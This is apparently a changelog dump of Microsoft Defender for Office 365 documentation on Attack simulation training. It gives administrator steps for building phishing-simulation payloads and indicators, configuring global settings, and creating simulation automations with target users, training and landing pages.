- These values are interrelated. Where you can place the indicator depends on the type of indicator. The available values are described in the following table:
-
- |Indicator type|Indicator location|
- |||
- |**Attachment type**|Message body|
- |**Distracting detail**|Message body|
- |**Domain spoofing**|Message body <br/><br/> From email address|
- |**Generic greeting**|Message body|
- |**Humanitarian appeals**|Message body|
- |**Inconsistency**|Message body|
- |**Lack of sender details**|Message body|
- |**Legal language**|Message body|
- |**Limited time offer**|Message body|
- |**Logo imitation or dated branding**|Message body|
- |**Mimics a work or business process**|Message body|
- |**No/minimal branding**|Message body|
- |**Poses as friend, colleague, supervisor, or authority figure**|Message body|
- |**Request for sensitive information**|Message body|
- |**Security indicators and icons**|Message body <br/><br/> Message subject|
- |**Sender display name and email address**|From name <br/><br/> From email address|
- |**Sense of urgency**|Message body <br/><br/> Message subject|
- |**Spelling and grammar irregularities**|Message body <br/><br/> Message subject|
- |**Threatening language**|Message body <br/><br/> Message subject|
- |**Too good to be true offers**|Message body|
- |**Unprofessional looking design or formatting**|Message body|
- |**URL hyperlinking**|Message body|
- |**You're special**|Message body|
-
- This list is curated to contain the most common clues that appear in phishing messages.
-
- If you select the email message subject or the message body as the location for the indicator, **Select text** appears. In the **Select required text** flyout that opens, select (highlight) the text in the message subject or message body where you want the indicator to appear. When you're finished, select **Select**.
-
- :::image type="content" source="../../media/attack-sim-training-payloads-add-indicators-select-location.png" alt-text="The Selected text location in the message body to add to an indicator in the new payload wizard in Attack simulation training" lightbox="../../media/attack-sim-training-payloads-add-indicators-select-location.png":::
-
- Back on the **Add indicator** flyout, the selected text appears in the **Text selected** section.
-
- - **Indicator description**: You can accept the default description for the indicator or you can customize it.
-
- - **Indicator preview**: To see what the current indicator looks like, click anywhere within the section.
-
- When you're finished in the **Add indicator** flyout, select **Add**
-
- Repeat these steps to add multiple indicators.
-
- Back on the **Add indicators** page, you can review the indicators you selected:
-
- - To edit an existing indicator, select it and then select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit indicator**.
-
- - To delete an existing indicator, select it and then select :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete**.
-
- - To move indicators up or down in the list, select the indicator, and then select :::image type="icon" source="../../media/m365-cc-sc-increase-icon.png" border="false"::: **Move up** or :::image type="icon" source="../../media/m365-cc-sc-decrease-icon.png" border="false"::: **Move down**.
-
- When you're finished on the **Add indicators** page, select **Next**.
-
-7. On the **Review payload** page, you can review the details of your payload.
-
- Select the :::image type="icon" source="../../media/m365-cc-sc-send-icon.png" border="false"::: **Send a test** button to send a copy of the payload email to yourself (the currently logged in user) for inspection.
-
- Select the :::image type="icon" source="../../media/m365-cc-sc-open-icon.png" border="false"::: **Preview indicator** button open the payload in a preview flyout. The preview includes all payload indicators that you've created.
-
- On the **Review payload** page, you can select **Edit** in each section to modify the settings within the section. Or you can select **Back** or the specific page in the wizard.
-
- When you're finished on the **Review payload** page, select **Submit**. On the confirmation page that appears, select **Done**.
-
- :::image type="content" source="../../media/attack-sim-training-payloads-review-payload.png" alt-text="The Review payload page in Attack simulation training in the Microsoft Defender portal" lightbox="../../media/attack-sim-training-payloads-review-payload.png":::
-
-8. On the **New payload created** page, you can use the links to view all simulations or go to the Attack simulation training overview.
-
- When you're finished on the **New payload created** page, select **Done**.
-
-9. Back on the **Tenant payloads** tab, the payload that you created is now listed with the **Status** value **Ready**.
-
-## Take action on payloads
-
-All actions on existing payloads start on the **Payloads** page. To go there, open the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Attack simulation training** \> **Content library** tab \> **Payloads** \> **Tenant payloads** tab. To go directly to the **Content library** tab where you can select **Payloads** and the **Tenant payloads** or **Global payloads** tabs, use <https://security.microsoft.com/attacksimulator?viewid=contentlibrary>.
-
-> [!TIP]
-> To see the **Γï«** (**Actions**) control on the **Global payloads** or **Tenant payloads** tabs, you likely need to do one or more of the following steps:
->
-> - Horizontally scroll in your web browser.
-> - Narrow the width of appropriate columns.
-> - Remove columns from the view.
-> - Zoom out in your web browser.
-
-## Modify payloads
-
-You can't modify built-in payloads on the **Global payloads** tab. You can only modify custom payloads on the **Tenant payloads** tab.
-
-To modify an existing payload on the **Tenant payloads** tab, do one of the following steps:
--- Select the payload by clicking the check box next to the name. Select the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit payload** action that appears.-- Select the payload by clicking anywhere in the row other than the check box. In the details flyout that opens, select **Edit payload** at the bottom of the flyout.-- Select the payload by clicking **Γï«** (**Actions**) at the end of the row, and then select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit**.-
-The payload wizard opens with the settings and values of the selected payload. The steps are the same as described in the [Create payloads](#create-payloads) section.
-
-## Copy payloads
-
-To copy an existing payload on the **Tenant payloads** or **Global payloads** tabs, do one of the following steps:
--- Select the payload by clicking the check box next to the name, and then select the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Copy payload** action that appears.-- Select the payload by clicking **Γï«** (**Actions**) at the end of the row, and then select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Copy payload**.-
-The create payload wizard opens with the settings and values of the selected payload. The steps are the same as described in the [Create payloads](#create-payloads) section.
-
-> [!NOTE]
-> When you copy a built-in payload on the **Global payloads** tab, be sure to change the **Name** value. If you don't, the payload will appear on the **Tenant payloads** page with the same name as the built-in payload.
-
-## Archive payloads
-
-You can't delete custom payloads from the **Tenant payloads** tab, but you can archive them.
-
-To archive an existing payload on the **Tenant payloads** tab, select the payload by clicking **Γï«** (**Actions**) at the end of the row, and then select :::image type="icon" source="../../media/m365-cc-sc-archive-icon.png" border="false"::: **Archive**.
-
-The **Status** value of the payload changes to **Archive**, and the payload is no longer visible on the **Tenant payloads** table when **Show archived payloads** is toggled off :::image type="icon" source="../../media/scc-toggle-off.png" border="false":::.
-
-To see archived payloads on the **Tenant payloads** tab, toggle **Show archived payloads** to on :::image type="icon" source="../../media/scc-toggle-on.png" border="false":::.
-
-## Restore archived payloads
-
-To restore an archive payload on the **Tenant payloads** tab, do the following steps:
-
-1. Set the **Show archived payloads** toggle to on :::image type="icon" source="../../media/scc-toggle-on.png" border="false":::.
-2. Select the payload by clicking **Γï«** (**Actions**) at the end of the row, and then select :::image type="icon" source="../../media/m365-cc-sc-archive-icon.png" border="false"::: **Restore**.
-
-After you've restored the archived payload, the **Status** value changes to **Draft**. Toggle **Show archived payloads** to off :::image type="icon" source="../../media/scc-toggle-off.png" border="false"::: to see the restored payload. To return the payload to the **Status** value **Ready**, [edit the payload](#modify-payloads), review or change the settings, and then select **Submit**.
-
-## Send a test
-
-On the **Tenant payloads** or **Global payloads** tabs, you can send a copy of the payload email to yourself (the currently logged in user) for inspection.
-
-Select the payload by clicking the check box next to the name, and then select the :::image type="icon" source="../../media/m365-cc-sc-send-icon.png" border="false"::: **Send a test** button that appears.
-
-## Related links
-
-[Get started using Attack simulation training](attack-simulation-training-get-started.md)
-
-[Create a phishing attack simulation](attack-simulation-training-simulations.md)
-
-[Gain insights through Attack simulation training](attack-simulation-training-insights.md)
security Attack Simulation Training Settings https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/attack-simulation-training-settings.md
- Title: Global settings in Attack simulation training------
- - m365-security
- - tier2
-description: Admins can learn how to configure global settings in Attack simulation training in Microsoft Defender for Office 365 Plan 2.
Previously updated : 6/14/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
--
-# Global settings in Attack simulation training
--
-In Attack simulation training in Microsoft 365 E5 or Microsoft Defender for Office 365 Plan 2, the **Settings** tab contains settings that affect all simulations:
--- **Repeat offender threshold**: A _repeat offender_ is someone who gives up their credentials in multiple consecutive simulations. How many simulations in a row constitute a repeat offender is determined by the repeat offender threshold. Information about repeat offenders appears in the following locations:
- - The [Repeat offenders card on the Overview tab](attack-simulation-training-insights.md#repeat-offenders-card) and the [Repeat offenders tab in the Attack simulation report](attack-simulation-training-insights.md#repeat-offenders-tab-for-the-attack-simulation-report).
- - When you select users in [simulations](attack-simulation-training-simulation-automations.md#target-users), [simulation automations](attack-simulation-training-simulation-automations.md#target-users), and [training simulations](attack-simulation-training-training-campaigns.md#target-users), you can find and filter repeat offenders.
--- **Training threshold**: In [Training campaigns](attack-simulation-training-training-campaigns.md), the _training threshold_ specifies a time period in days to prevent users from having the same training modules assigned to them. Specifically, a training module isn't reassigned to users who completed the module during the training threshold, nor is a training module assigned to users who haven't completed modules assigned during the training threshold. For more information, see [Set the training threshold time period](attack-simulation-training-training-campaigns.md#set-the-training-threshold).--- **View exclude simulations from reporting**: After a simulation has completed, you can exclude the results of the simulation from reporting. For instructions, see [Exclude completed simulations from reporting](attack-simulation-training-simulations.md#exclude-completed-simulations-from-reporting). You can use the **View all** link in this section to see excluded simulations on the **Simulations** tab.-
-To get to the **Settings** tab, open the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Attack simulation training** \> **Content library** tab \> and then select **Login pages**. To go directly to the **Settings** tab, use <https://security.microsoft.com/attacksimulator?viewid=setting>.
-
-For getting started information about Attack simulation training, see [Get started using Attack simulation training](attack-simulation-training-get-started.md).
-
-## Configure the repeat offender threshold
-
-To configure the repeat offender threshold, use the box in the **Repeat offender threshold** section on the **Settings** tab. The default value is 2.
-
-## Configure the training threshold
-
-To configure the training threshold, use the box in the **Training threshold** section on the **Settings** tab. The default value is 90 days.
-
-The training threshold starts from the time that modules are assigned to users.
-
-We recommend that this value is greater than the number of days users have to complete a training module.
-
-To remove the training threshold and always assign training, regardless of whether a user has already completed or been assigned a training, set value to 0.
-
-## View simulations excluded from reporting
-
-To view completed simulations that have been excluded from reporting on the **Settings** tab, select the **View all** link in the **Simulations excluded from reporting** section. This link takes you to the **Simulations** tab at <https://security.microsoft.com/attacksimulator?viewid=simulations> where **Show excluded simulations** is automatically toggled on :::image type="icon" source="../../media/scc-toggle-on.png" border="false":::.
-
-On the **Simulations** tab, both excluded _and_ included completed simulations are shown on the **Simulations** tab together. You can tell the difference by the **Status** values (**Excluded** vs. **Completed**).
-
-If you go directly to the **Simulations** tab and manually toggle **Show excluded simulations** on :::image type="icon" source="../../media/scc-toggle-on.png" border="false":::, _only_ excluded simulations are shown.
-
-To exclude completed simulations from reporting, see [Exclude completed simulations from reporting](attack-simulation-training-simulations.md#exclude-completed-simulations-from-reporting).
security Attack Simulation Training Simulation Automations https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/attack-simulation-training-simulation-automations.md
- Title: Simulation automations for Attack simulation training------
- - m365-security
- - tier2
-description: Admins can learn how to create automated simulations that contain specific techniques and payloads that launch when the specified conditions are met in Microsoft Defender for Office 365 Plan 2.
Previously updated : 3/14/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
--
-# Simulation automations for Attack simulation training
--
-In Attack simulation training in Microsoft 365 E5 or Microsoft Defender for Office 365 Plan 2, simulation automations allow you to run multiple benign cyberattack simulations in your organization. Simulation automations can contain multiple social engineering techniques and payloads, and can start on an automated schedule. Creating a simulation automation is similar to [creating an individual simulation](attack-simulation-training-simulations.md), except for the ability to select multiple techniques, payloads, and the automation schedule.
-
-For getting started information about Attack simulation training, see [Get started using Attack simulation training](attack-simulation-training-get-started.md).
-
-To see any existing simulation automations that you created, open the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Attack simulation training** \> **Automations** tab \> and then select **Simulation automations**. To go directly to the **Automations** tab where you can select **Simulation automations**, use <https://security.microsoft.com/attacksimulator?viewid=automations>.
-
-The following information is shown for each simulation automation. You can sort the simulation automations by clicking on an available column header.
--- **Name campaign**-- **Status**: **Active**, **Inactive**, or **Draft**.-- **Next launch time**-- **Last modified**-- **Created by**-
-## Create simulation automations
-
-To create a simulation automation, do the following steps:
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com/>, go to **Email & collaboration** \> **Attack simulation training** \> **Automations** tab \> **Simulation automations**. or, to go directly to the **Automations** tab where you can select **Simulation automations**, use <https://security.microsoft.com/attacksimulator?viewid=automations>.
-
-2. On the **Simulation automations** page, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Create automation** to start the new simulation automation wizard.
-
- :::image type="content" source="../../media/attack-sim-training-sim-automations-create.png" alt-text="The Create simulation button on the Simulation automations tab in Attack simulation training in the Microsoft Defender portal" lightbox="../../media/attack-sim-training-sim-automations-create.png":::
-
- The following sections describe the steps and configuration options to create a simulation automation.
-
- > [!NOTE]
- > At any point after you name the simulation automation during the new simulation automation wizard, you can select **Save and close** to save your progress and continue later. The incomplete simulation automation has the **Status** value **Draft**. You can pick up where you left off by selecting the simulation automation from the list and then clicking the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit automation** action that appears.
-
-## Name and describe the simulation automation
-
-On the **Automation name** page, configure the following settings:
--- **Name**: Enter a unique, descriptive name for the simulation.-- **Description**: Enter an optional detailed description for the simulation.-
-When you're finished on the **Automation name** page, select **Next**.
-
-## Select one or more social engineering techniques
-
-On the **Select social engineering techniques** page, select one or more of the available social engineering techniques, which were curated from the [MITRE ATT&CK® framework](https://attack.mitre.org/techniques/enterprise/). Different payloads are available for different techniques. The following social engineering techniques are available:
--- **Credential Harvest**: Attempts to collect credentials by taking users to a well-known looking website with input boxes to submit a username and password.-- **Malware Attachment**: Adds a malicious attachment to a message. When the user opens the attachment, arbitrary code is run that helps the attacker compromise the target's device.-- **Link in Attachment**: A type of credential harvest hybrid. An attacker inserts a URL into an email attachment. The URL within the attachment follows the same technique as credential harvest.-- **Link to Malware**: Runs some arbitrary code from a file hosted on a well-known file sharing service. The message sent to the user contains a link to this malicious file. Opening the file helps the attacker compromise the target's device.-- **Drive-by URL**: The malicious URL in the message takes the user to a familiar-looking website that silently runs and/or installs code on the user's device.-- **OAuth Consent Grant**: The malicious URL asks users to grant permissions to data for a malicious Azure Application.-
-If you select the **View details** link in the description, a details flyout opens that describes the technique and the simulation steps that result from the technique.
--
-When you're finished on the **Select social engineering techniques** page, select **Next**.
-
-## Select payloads and login pages
-
-On the **Select payloads and login page** page, you need to select at least one existing payload for each social engineering technique you selected, or you can create new payloads to use.
-
-For the **Credential Harvest** or **Link in Attachment** social engineering techniques, you can also view the login page that's used in the payload, select a different login page to use, or create a new login page to use.
-
-### Select payloads
-
-On the **Select payloads and login page** page, select one of the following options:
--- **Randomize**: There's nothing else to configure on this page, so select **Next** to continue.-- **Manually select**: The following details are shown for each payload. Select a column header to sort by that column:
- - **Payload name**
- - **Source**: For built-in payloads, the value is **Global**. For custom payloads, the value is **Tenant**.
- - **Technique**: You need to select at least one payload per technique that you selected on the **Select social engineering techniques** page.
- - **Language**: The language of the payload content. Microsoft's payload catalog (global) provides payloads in 29+ languages as described in :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**.
- - **Predicted compromise rate (%)**: Historical data across Microsoft 365 that predicts the percentage of people who will be compromised by this payload (users compromised / total number of users who receive the payload). For more information, see [Predicted compromise rate](attack-simulation-training-get-started.md#predicted-compromise-rate).
-
- Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to search for the name of an existing payload.
-
- If you select a payload from the list by clicking anywhere in the row other than the check box next to the name, details about the payload are shown in a flyout:
-
- - The **Overview** tab (named **Payload** in **Credential Harvest** and **Link in Attachment** payloads) contains details about the payload, include a preview.
- - The **Login page** tab is available only for **Credential Harvest** or **Link in Attachment** payloads and is described in the [Select login pages](#select-login-pages) subsection.
- - The **Attachment** tab is available only for **Malware Attachment**, **Link in Attachment**, and **Oauth Consent Grant** payloads. This tab contains details about the attachment, including a preview.
- - The **Simulations launched** tab contains the **Simulation name**, **Click rate**, **Compromised rate**, and **Action**.
-
- > [!TIP]
- > To see details about other payloads without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
- Leave the payload details flyout open to change the login page or create a new login page to use as described in the following subsections.
-
- Or, if you're finished in the payload details flyout, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: **Close** to return to the **Select payloads and login page** page, verify one or more of the required payloads are selected and then select **Next** to continue.
-
- :::image type="content" source="../../media/attack-sim-training-simulations-select-payload-details-payload-tab.png" alt-text="The Payload tab in the payload details flyout in Attack simulation training in the Microsoft Defender portal" lightbox="../../media/attack-sim-training-simulations-select-payload-details-payload-tab.png":::
-
-### Select login pages
-
-> [!NOTE]
-> The **Login page** tab is available only in the details flyout of **Credential Harvest** or **Link in Attachment** payloads.
-
-On the **Select payload and login page** page, select the **Credential Harvest** or **Link in Attachment** payload from the list by clicking anywhere in the row other than the check box next to the name to open the details flyout for the payload.
-
-In the details flyout of the payload, the **Login page** tab shows the login page that's currently selected for the payload.
-
-To view the complete login page, use the **Page 1** and **Page 2** links at the bottom of the page for two-page login pages.
--
-Use one of the following procedures to change the login page that's used in the payload or to create a new login page to use in the flyout:
--- Change the login page that's used in the payload: Select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Change login page** on the **Login page** tab of the payload details flyout.-
- On the **Select login page** flyout that opens, The following information is shown for each login page:
-
- - **Name**
- - **Language**
- - **Source**: For built-in login pages, the value is **Global**. For custom login pages, the value is **Tenant**.
- - **Created by**: For built-in login pages, the value is **Microsoft**. For custom login pages, the value is the UPN of the user who created the login page.
- - **Last modified**
- - **Actions**: Select :::image type="icon" source="../../media/m365-cc-sc-eye-icon.png" border="false"::: **Preview** to preview the login page.
-
- Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to find a login page in the list by typing part of the login name, and then pressing the ENTER key.
-
- Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to filter the login pages by **Source** or **Language**.
-
- When you're finished in the **Filter** flyout, select **Apply**. To clear the filters, select :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
- :::image type="content" source="../../media/attack-sim-training-simulations-select-payload-select-login-page.png" alt-text="The Select login page flyout from the Login page tab in payload details flyout in Attack simulation training in the Microsoft Defender portal." lightbox="../../media/attack-sim-training-simulations-select-payload-select-login-page.png":::
-
- On the **Select login page** flyout, select the check box next to the name of the login page to use, and then select **Save**. Back on the **Login page** tab of the payload details flyout, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: **Close** to return to the **Select payloads and login page** page.
--- Create a new login page to use in the payload: Select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Change login page** on the **Login page** tab of the payload details flyout.-
- On the **Select login page** flyout that opens, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Create new**.
-
- The creation steps are the same as at **Attack simulation training** \> **Content library** tab \> **Login pages** \> **Tenant login pages** tab. For instructions, see [Create login pages](attack-simulation-training-login-pages.md#create-login-pages).
-
- Back on the **Select login page** flyout, select the check box next to the name of the login page to use, and then select **Save**. Back on the **Login page** tab of the payload details flyout, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: **Close** to return to the **Select payloads and login page** page.
-
-On the **Select payloads and login page** page, verify the payloads that you configured and/or want to use are selected.
-
-When you're finished on the **Select a payload and login page** page, select **Next**.
-
-### Configure OAuth Payload
-
-> [!NOTE]
-> This page is available only if you selected **OAuth Consent Grant** on the [Select social engineering techniques](#select-one-or-more-social-engineering-techniques) page and a corresponding payload.
-
-On the **Configure OAuth payload** page, configure the following settings:
--- **App name**: Enter a name for the payload.-- **App logo**: Select **Browse** to select a .png, .jpeg, or .gif file to use. To remove a file after you selected it, select **Remove**.-- **Select app scope**: Choose one of the following values:
- - **Read user calendars**
- - **Read user contacts**
- - **Read user mail**
- - **Read all chat messages**
- - **Read all files that user can access**
- - **Read and write access to user mail**
- - **Send mail as a user**
-
-When you're finished on the **Configure OAuth payload** page, select **Next**.
-
-## Target users
-
-On the **Target users** page, select who receives the simulation. Use the following options to select users:
--- **Include all users in your organization**: **Include all users in your organization**: The unmodifiable list of users is show in groups of 10. You can use **Next** and **Previous** below the list of users to scroll through the list. You can also use :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** on the page to find specific users.--- **Include only specific users and groups**: At first, no users or groups are shown on the **Targeted users** page. To add users or groups to the simulation, choose one of the following options:-
- - :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add users**: In the **Add users** flyout that opens, you find and select users and groups to receive the simulation. **Dynamic distribution groups are not supported**. The following search tools are available:
-
- - **Search for users or groups**: If you click in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and do one of the following actions, the **Filter users by categories** options on the **Add users** flyout are replaced by a **User list** section:
- - Type three or more characters and then press the ENTER key. Any users or group names that contain those characters are shown in the **User list** section by **Name** and **Email**.
- - Type less than three characters or no characters and then press the ENTER key. No users are shown in the **User list** section, but you can type three or more characters in the **Search** box to search for users and groups.
-
- The number of results appears in the **Selected (0/x) users** label.
-
- > [!NOTE]
- > Selecting **Add filters** clears and replaces any results the **User list** section with **Filter users by categories**.
-
- When you have a list of users or groups in the **User list** section, select some or all of the results by selecting the check box next to the **Name** column. The number of selected results appears in the **Selected (y/x) users** label.
-
- Select **Add x users** to add the selected users or groups on the **Target users** page and to return to the **Target users** page.
-
- - **Filter users by categories**: Use the following options:
-
- - **Suggested user groups**: Select from the following values:
- - **All suggested user groups**: The same result as selecting **Users not targeted by a simulation in the last three months** and **Repeat offenders**.
- - **Users not targeted by a simulation in the last three months**
- - **Repeat offenders**: For more information, see [Configure the repeat offender threshold](attack-simulation-training-settings.md#configure-the-repeat-offender-threshold).
-
- - **User tags**: User tags are identifiers for specific groups of users (for example, Priority accounts). For more information, see [User tags in Microsoft Defender for Office 365](user-tags-about.md). Use the following options:
- - **Search**: In :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search by user tags**, you can type part of the user tag name and then press Enter. You can select some or all of the results.
- - Select **All user tags**
- - Select existing user tags. If the link is available, select **See all user tags** to see the complete list of available tags.
-
- - **City**: Use the following options:
- - **Search**: In :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search by City**, you can type part of the City value and then press Enter. You can select some or all of the results.
- - Select **All City**
- - Select existing City values. If the link is available, select **See all Cities** to see the complete list of available City values.
-
- - **Country**: Use the following options:
- - **Search**: In :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search by Country**, you can type part of the Country value and then press Enter. You can select some or all of the results.
- - Select **All Country**
- - Select existing City values. If the link is available, select **See all Countries** to see the complete list of available Country values.
-
- - **Department**: Use the following options:
- - **Search**: In :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search by Department**, you can type part the Department value and then press Enter. You can select some or all of the results.
- - Select **All Department**
- - Select existing Department values. If the link is available, select **See all Departments** to see the complete list of available Department values.
-
- - **Title**: Use the following options:
- - **Search**: In :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search by Title**, you can type part of the Title value and then press Enter. You can select some or all of the results.
- - Select **All Title**
- - Select existing Title values. If the link is available, select **See all Titles** to see the complete list of available Title values.
-
- :::image type="content" source="../../media/attack-sim-training-simulations-target-users-filter-by-category.png" alt-text="The User filtering on the Target users page in Attack simulation training in the Microsoft Defender portal" lightbox="../../media/attack-sim-training-simulations-target-users-filter-by-category.png":::
-
- You can use some or all of the search categories to find users and groups. If you select multiple categories, the AND operator is used. Any users or groups must match both values to be returned in the results (which is virtually impossible if you use the value **All** in multiple categories).
-
- The number of values that were used as the search criteria by a specific category is shown next to the category tile (for example, **City 50** or **Priority accounts 10**).
-
- When you're finished searching by category, select the **Apply(x)** button. The previous **Filter users by categories** options on the **Add users** flyout are replaced by the following information:
-
- - **Filters** section: Show how many filter values you used and the names of the filter values. If it's available, select the **See all** link to see all filter values
- - **User list** section: Shows the users or groups that match your category searches. The number of results appears in the **Selected (0/x) users** label.
-
- When you have a list of users or groups in the **User list** section, select some or all of the results by selecting the check box next to the **Name** column. The number of selected results appears in the **Selected (y/x) users** label.
-
- Select the **Add x users** button to add the selected users or groups on the **Target users** page and to return to the **Target users** page.
-
- - :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Import**: In the dialog that opens, specify a CSV file that contains one email address per line.
-
- After you find a select the CSV file, the users are imported and shown on the **Targeted users** page.
-
- On the main **Target users** page, you can use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to find selected users. You can also select :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Delete** and then **Confirm** in the confirmation dialog to remove specific users.
-
- To add more users and groups, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add users** or :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Import** on the **Target users** page and repeat the previous steps.
-
-When you're finished on the **Target users** page, select **Next**.
-
-## Assign training
-
-On the **Assign training** page, you can assign trainings for the simulation. We recommend that you assign training for each simulation, as employees who go through training are less susceptible to similar attacks.
-
-Use the following options on the page to assign trainings as part of the simulation:
--- **Preferences** section: In **Select training content preference**, choose one of the following options in the dropdown list:-
- - **Microsoft training experience (Recommended)**: This is the default value. This value has the following associated options to configure on the page:
- - Select one of the following values:
- - **Assign training for me (Recommended)**: This is the default value. We assign training based on a user's previous simulation and training results.
- - **Select training courses and modules myself**: If you select this value, the next step in the wizard is **Training assignment** where you find and select trainings. The steps are described in the [Training assignment](#training-assignment) subsection.
- - **Due date** section: In **Select a training due date**, choose one of the following values:
- - **30 days after simulation ends** (this is the default value)
- - **15 days after simulation ends**
- - **7 days after simulation ends**
-
- - **Redirect to a custom URL**: This value has the following associated options to configure on the page:
- - **Custom training URL** (required)
- - **Custom training name** (required)
- - **Custom training description**
- - **Custom training duration (in minutes)**: The default value is 0, which means there's no specified duration for the training.
- - **Due date** section: In **Select a training due date**, choose one of the following values:
- - **30 days after simulation ends** (this is the default value)
- - **15 days after simulation ends**
- - **7 days after simulation ends**
-
- - **No training**: If you select this value, the only option on the page is **Next**.
-
-When you're finished on the **Assign training** page, select **Next**.
-
-### Training assignment
-
-> [!NOTE]
-> This page is available only if you selected **Select training courses and modules myself** on the **Assign training** page.
-
-On the **Training assignment** page, select the trainings that you want to add to the simulation by selecting :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add trainings**.
-
-In the **Add training** flyout that opens, use the following tabs to select trainings to include in the simulation:
--- **Recommended** tab: Shows the recommended built-in trainings based on the simulation configuration. These trainings are the same trainings that would have been assigned if you selected **Assign training for me (Recommended)** on the previous page.-- **All trainings** tab: Shows all built-in trainings that are available.--
-On either tab, the following information is shown for each training:
--- **Training name**-- **Source**: The value is **Global**.-- **Duration (mins)**-- **Preview**: Select **Preview** to see the training.-
-On either tab, you can use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to find trainings. Type part of the training name and press the ENTER key.
-
-On either tab, select one or more trainings by selecting the check box next to the training name. To select all trainings, select the check box in the **Training name** column header. When you're finished, select **Add**.
-
-Back on the **Training assignment** page, the selected trainings are now listed. The following information is shown for each training:
--- **Training name**-- **Source**-- **Duration (mins)**-- **Assign to**: For each training, select who gets the training by selecting from the following values:
- - **All users**
- - One or both of the values **Clicked payload** or **Compromised**.
-- **Delete**: Select :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** to remove the training from the simulation.--
-When you're finished on the **Training assignment** page, select **Next**.
-
-### Select a landing page
-
-On the **Select phish landing page** page, configure the web page that users are taken to if they open the payload in the simulation.
-
-Select one of the following options:
--- **Use landing pages from library**: The following options are available:
- - **Payload indicators** section: Select **Add payload indicators to email** to help users learn how do identify phishing email.
- - This setting isn't available if you selected **Malware Attachment** or **Link to Malware** on the [Select one or more techniques](#select-one-or-more-social-engineering-techniques) page.
- - For landing pages that you create on the **Tenant landing pages** tab, this setting is meaningful only if you use the **Dynamic tag** named **Insert Payload content** in the landing page content as described in the [Create landing pages](attack-simulation-training-landing-pages.md#create-landing-pages) subsection.
- - **Show the interstitial page before the landing page**: This setting is available only if you selected **Drive-by URL** on the [Select one or more techniques](#select-one-or-more-social-engineering-techniques) page. You can show the overlay that comes up for drive-by URL attacks. To hide the overlay and go directly to the landing page, don't select this option.
-
- The remainder of the **Selecting phish landing page** page has two tabs where you select the landing page to use:
-
- - **Global landing pages** tab: Contains the built-in landing pages. When you select a built-in landing page to use by selecting the check box next to name, an **Edit layout** section appears with the following options:
- - **Add logo**: Select **Browse logo image** to find and select a .png, .jpeg, or .gif file. The logo size should be a maximum of 210 x 70 to avoid distortion. To remove the logo, select **Remove uploaded logo image**.
- - **Select default language**: This setting is required. Select one of the following values: **Chinese (Simplified)**, **Chinese (Traditional, Taiwan)**, **Dutch**, **English**, **Spanish**, **French**, **German**, **Italian**, **Japanese**, **Korean**, **Portuguese, or **Russian**.
-
- - **Tenant landing pages** tab: Contains any custom landing pages that you created. To create a new landing page, select :::image type="icon" source="../../medi#create-landing-pages).
-
- On both tabs, the following information is shown for each landing page. You can sort the landing pages by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. The default columns are marked with an asterisk (<sup>\*</sup>):
-
